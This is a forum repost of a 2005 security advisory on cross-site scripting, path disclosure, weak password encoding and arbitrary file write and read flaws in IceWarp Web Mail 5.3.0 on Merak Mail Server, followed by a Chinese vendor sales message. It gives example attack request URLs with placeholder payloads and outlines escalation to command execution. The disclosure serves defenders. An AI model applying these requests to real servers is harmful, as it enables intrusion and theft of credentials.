[转载]Multiple vulnerabilities in Icewarp Web Mail 5.3.0
信息来源:[url]www.securityfocus.com[/url]TITLE: Multiple vulnerabilities in Icewarp Web Mail 5.3.0 : New holes.
BACKGROUND
Merak Mail Server, with the revolutionary Merak Mail Server GroupWare Server, cutting-
edge Merak Mail Server Instant Antispam and much more, is the fastest, most
stable, secure and 100% virus free mail server on the market today.
Every day companies choose Merak Mail Server's stability, speed, security, functionality,
scalability and multi-tiered delegated manageability over products costing
thousands of dollars more yet lacking the sophistication that Merak delivers.
In less than 10 minutes you can have the same professional email server that organizations
such as NATO, the U.S. Navy, the FBI, Toyota, the U.S. Government, and
many ISP Providers and Developers depend on every day.
Source: [url]www.MerakMailServer.com[/url]
VULNERABLE PRODUCTS
MERAK Mail Server 7.6.0 with Icewarp Web Mail 5.3.0
MERAK Mail Server 7.6.4r with Icewarp Web Mail 5.3.2 (vulnerabilities #2,#3 only)
DETAILS
1. Multiple cross-site scripting (XSS) vulnerabilities.
Description:
Remote user, who HAS account on Merak Mail Server, can execute cross-site scripting
(XSS) attack.
Vulnerable pages:
login.html
accountsettings_add.html
calendar_addnote.html
calendar_addtask.html
calendar_addevent.html
Examples:
[url]http://localhost:32000/mail/login.html?username=[/url][xss_here]
[url]http://localhost:32000/mail/accountsettings_add.html?id=[/url][]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[xss_here]
[url]http://localhost:32000/mail/calendar.html[/url] -> AddNote -> [Title]= [xss_here]
[url]http://localhost:32000/mail/calendar.html[/url] -> AddTask -> [Note]=[xss_here]
[url]http://localhost:32000/mail/calendar.html[/url] -> AddEvent -> [Note]=[xss_here]
[url]http://localhost:32000/mail/calendar.html[/url] -> AddEvent -> [Title]= [xss_here]
[url]http://localhost:32000/mail/calendar.html[/url] -> AddEvent -> [Location]= [xss_here]
2. Full install path disclosure.
Description:
Remote user, who HAS account on Merak Mail Server, can disclosure full install path
of the product. It could be used during attack on an affected system.
Vulnerable pages:
calendar_d.html
calendar_m.html
calendar_w.html
calendar_y.html
Examples:
[url]http://localhost:32000/mail/calendar_d.html?id=[/url][sessionid]
[url]http://localhost:32000/mail/calendar_m.html?id=[/url][sessionid]
[url]http://localhost:32000/mail/calendar_w.html?id=[/url][sessionid]
[url]http://localhost:32000/mail/calendar_y.html?id=[/url][sessionid]
Note: MERAK Mail Server 7.6.4r with Icewarp Mail Server 5.3.2 also vulnerable to it.
3. Simple encryption of users passwords.
Description:
Very simple encryption of users passwords in users.cfg, settings.cfg (XOR), users.dat,
user.dat (BASE64). If attacker will get access to this files then he could
take users and administrators passwords.
Vulnerable files:
[MerakDir] \config\settings.cfg
[MerakDir] \config\ [Domain] \users.cfg
[MerakDir] \webmail\config\users.dat
[MerakDir] \webmail\users\ [Domain] \ [User] \user.dat
Note: MERAK Mail Server 7.6.4r with Icewarp Mail Server 5.3.2 also vulnerable to it.
4. File creation with arbitrary content on remote system.
Description:
Remote user, who HAS account on Merak Mail Server, can create text file on remote
server with arbitrary content (include special characters). Path to the file will
be [MerakDir]\webmail\users\[Domain]\[User]\accounts.dat.
Vulnerable page: accountsettings_add.html
Example:
[url]http://localhost:32000/mail/accountsettings_add.html?id=[/url][sessionid]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[arbitary
text]
5. Moving and viewing arbitrary files on remote system.
Description:
Remote user, who HAS account on Merak Mail Server, can move arbitrary files on local
file system of the target. The file will be moved to [MerakDir]\webmail\users\[Domain]\[User]
folder and will be renamed to import.tmp. After that attacker can
view this file and import/export it to/from address book. This vulnerability
could be used for causing denial of service (DOS) conditions or access to arbitrary
files on affected system. From files user.dat, users.dat attacker could get
users and administrators passwords (vulnerability #3) and take complete control
of a Merak Mail Server. With administrator privileges on Merak Mail Server the attacker
using [Executables] function of the product could execute arbitrary commands
on remote system with mailserver privileges. If Merak Mail Server was been
running under administrator account then attacker could take complete control of
an affected system. This vulnerability also could be used for verifying existing
of the arbitrary files on
remote system.
Vulnerable page: importaction.html
Example:
[url]http://localhost:32000/importaction.html?id=[/url][sessionid]&importfile=[arbitrary path]&action=upload&Import=1&importfile_size=1000000
EXPLOITATION
IceWarp Web Mail (control.exe service) must be running on Merak Mail Server. Account
on Merak Mail Server is needed.
WORKAROUND
Upgrade to MERAK Mail Server 7.6.4r with Icewarp Web Mail 5.3.2 or disable Icewarp
Web Mail service (Control.exe).
VENDOR STATUS
Not contacted.
SUMMARY
An attacker who successfully exploited vulnerabilities described in this report could
take complete control of a Merak Mail Server 7.6.0 or an affected remote system.
Merak Mail Server 7.6.4r with Icewarp Web Mail 5.3.2 also vulnerable to other
(undescribed in this report) critical vulnerabilities. An attacker who successfully
exploited of this undescribed vulnerabilities could take complete control
of a Merak Mail Server or an affected remote system. I am not advice to use this
product, you must disable Icewarp Web Mail service.
CREDITS
ShineShadow, undependent IT security expert.
To get more information, please contact me by e-mail.
26.01.2005
ShineShadow,
ss_contacts hotmail com 我是欧洲顶级电邮系统 Merak Mail Server 开发商IceWarp Ltd.中国分公司的客户代表倪壁然.很高兴知道大批的客户对 IceWarp 的厚爱,也感谢贵公司一直以来的支持。您在
([url]http://www.eviloctal.com/forum/htm_data/25/0501/7340.html[/url])仍在公布的是我们的旧版本
IceWarp中国公司拥有全部IceWarp与Merak Mail Server 商标/品牌版权(已在全世界及北京注册).为了规范中国市场. 所有网站只能提供我们正规试用版本,除非已获得我们书面授权.如仍然提供破解版,不正规版或Beta测试版均属侵权,必需负上法律责任.
我们可以免费提供 Merak Mail Server V8.3.0 最新试用版本 (中,英文版)
软件大小:25M
软件语言:繁体/简体/德文/英文
应用平台:Win9x/NT/2000/2003/XP/64bit/Linux
开发商:欧洲 IceWarp Ltd.
网站: [url]www.icewarp.cn[/url]
联 系 人:[email]sales@icewarp.cn[/email]
下载地址:[url]http://www.icewarp.cn/Download/index_gb.html[/url]
为了能让贵公司与您的客户能够正常以及更好的使用Merak Mail Server ,请尽快
升级使用我们的最新版本。
欢迎联系我们拿到第一手资料.也可以让您网站上有最新版本,来提高您网站的点即量
和下载量,增加您的客户。
如果您还想获取更多产品资讯及价格,请联系我们:
中国 微力 [url]Http://www.icewarp.cn[/url]
地址:深圳罗湖区人民南路天安国际大厦B座1901室 联系人:倪壁然
7*27小时咨询服务电话:0755-82186489/82185489-3026 传真:0755-82182989
E-mail:jackal@icewarp.cn MSN:[email]wanghao8788@hotmail.com[/email]
身为IT界的您,还要为每天数百封垃圾、病毒电邮而烦恼吗?或者为了应付这困局而花上几万甚至十几万安装硬体过滤器?另一方面,您正推介什么电邮软件给您的客户?您希望推荐最佳的产品给客户吗?你们急需一个安全、可靠、有效却价钱实惠的电邮系统,微力电邮系统是您和客户的最佳选择。
请立即登陆[url]www.icewarp.cn[/url]下载Merak Mail Server,您最好的电邮服务系统
页:
[1]